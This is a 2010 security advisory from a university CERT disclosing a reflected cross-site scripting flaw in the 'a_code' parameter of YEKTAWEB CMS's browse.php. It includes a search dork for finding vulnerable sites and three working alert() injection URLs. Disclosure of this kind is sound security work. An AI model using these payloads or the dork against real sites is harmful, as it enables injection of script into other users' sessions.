YEKTAWEB CMS XSS Vulnerability

faghani Wed, 29 Dec 2010 09:03:41 -0800

================= IUT-CERT =================



Title: YEKTAWEB CMS XSS Vulnerability



Vendor: www.yektaweb.com



Dork: Powered by Academic Web Tools ( AWT ) - Yektaweb Collection

Type: Input.Validation.Vulnerability (cross-Site scripting)



Fix: N/A



================== nsec.ir =================





Description:

--------------------------------------------



YEKTAWEB is an Academic web tool. "browse.php" pages in this CMS is vulnerable 

to xss and link injection.





Vulnerability Variant:

---------------------------------------------

XSS: "browse.php" in "a_code" parameter. 



http://www.example.com/browse.php?a_code=";></IFRAME><script>alert(12345)</script>&sid=1&slc_lang=fa

http://www.example.com/browse.php?a_code=1<iframe/+/onload=alert(12345)></iframe>.

http://www.example.com/browse.php?a_code=1>"><ScRiPt 
%0A%0D>alert(12345)%3B</ScRiPt>.



Solution:

---------------------------------------------



Input validation of Parameter "a_code" should be corrected.





Credit:

---------------------------------------------



Isfahan University of Technology - Computer Emergency Response Team



Thanks to :  N. Fathi, M. R. Faghani

YEKTAWEB CMS XSS Vulnerability

Reply via email to